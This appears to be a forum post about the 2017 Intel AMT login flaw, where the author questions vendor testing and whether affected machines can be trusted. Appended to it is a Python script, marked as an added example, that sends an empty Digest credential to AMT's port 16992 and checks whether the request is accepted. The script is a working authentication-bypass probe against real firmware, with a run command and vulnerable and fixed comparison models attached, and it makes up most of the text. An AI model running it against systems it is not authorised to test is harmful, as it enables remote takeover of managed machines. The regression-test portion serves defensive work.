There's a good summary about 3/4 of the way down the page.
https://arstechnica.com/security/2017/05/the-hijacking-flaw-that-lurked-in-i...
Just write a simple C/Python/Perl/Go program that sends a zero-length password, done.
This certainly seems to show there was no fuzzing or even simple testing of the HTTP server in AMT. Is it possible they ONLY ever tested the login dialog by hand, with a web browser? It seems so. Yeeesh!
I thought the whole reflash path of AMT was to ask it to reflash itself. Is that incorrect? If correct, and the AMT has been exploited via this path, can we really trust any reflash operation? Any thoughts on this from anyone who knows?
I was involved in some USG issues around the time of Y2K and at least one agency shredded every non-Y2K-compliant system they had. Would that make sense for systems with this AMT vulnerability? Just assume the worst and destroy them?
I am long past believing one can build secure platforms on any x86 chipset. This mess only strengthens that conviction. But there are some great RISC-V announcements this week!
ron
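The test the post suggests, as an added example that is not part of the original post or of any vendor code: a Python probe that sends an HTTP Digest request whose credential (the `response` field) is the empty string, alongside two toy models of the server-side comparison. The "vulnerable" model, a compare bounded by the attacker-supplied length, is an assumed illustration of the bug class such a test catches; the post itself does not describe the AMT server's internals. Host, port 16992, the URI and the username are assumed defaults, not values from the post. The `digest_response` helper is only there to show why a browser-driven test never hits this path: even an empty password yields a full 32-hex-character response, so only a hand-built request sends the empty string.

```python
# Added example (not code from the original post): a minimal harness in the
# spirit of "send a zero-length password and see what happens".
import hashlib
import hmac
import http.client
import re

# --- Two models of the server-side credential check ----------------------

def check_vulnerable(expected: str, supplied: str) -> bool:
    """Compare only as many bytes as the client supplied.

    Models C code of the form
        strncmp(expected, supplied, strlen(supplied)) == 0
    where the attacker controls the length. A zero-length credential compares
    zero bytes and therefore always "matches"; any correct prefix matches too.
    (Assumed pattern for illustration; the post does not describe the server.)
    """
    n = len(supplied)
    return expected[:n] == supplied[:n]


def check_fixed(expected: str, supplied: str) -> bool:
    """Length-checked, constant-time comparison of the full value."""
    return len(supplied) == len(expected) and hmac.compare_digest(expected, supplied)

# --- Client side: build and send the probe ------------------------------

def digest_response(user: str, realm: str, password: str, nonce: str,
                    method: str, uri: str) -> str:
    """RFC 2617 MD5 response without qop, as a browser would compute it.

    Note that an empty password still produces a 32-character hex string, so
    testing through a browser can never send an empty response field.
    """
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def parse_challenge(www_authenticate: str) -> dict:
    """Pull the quoted key="value" pairs out of a WWW-Authenticate header."""
    return dict(re.findall(r'(\w+)="([^"]*)"', www_authenticate))


def empty_credential_header(user: str, realm: str, nonce: str, uri: str) -> str:
    """Authorization header whose response field is the empty string."""
    return (f'Digest username="{user}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response=""')


def probe(host: str, port: int = 16992, uri: str = "/index.htm",
          user: str = "admin") -> int:
    """Send a request with an empty credential; return the final HTTP status.

    Anything other than 401 on the second request means the empty credential
    was accepted. Port 16992 and the URI are assumed defaults. This function
    needs a live host and is not exercised by the offline checks.
    """
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", uri)
    first = conn.getresponse()
    first.read()
    if first.status != 401:          # no challenge at all: nothing to test
        conn.close()
        return first.status
    chal = parse_challenge(first.getheader("WWW-Authenticate", ""))
    hdr = empty_credential_header(user, chal.get("realm", ""),
                                  chal.get("nonce", ""), uri)
    conn.request("GET", uri, headers={"Authorization": hdr})
    second = conn.getresponse()
    second.read()
    conn.close()
    return second.status


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    status = probe(target)
    print("empty credential ->", status, "(401 expected; anything else is a finding)")
```

Run it as `python3 probe.py <host>`; a 200 (or any non-401) on the second request is the finding. The two `check_*` functions are the regression test you would keep: the empty string and a correct prefix must both be rejected.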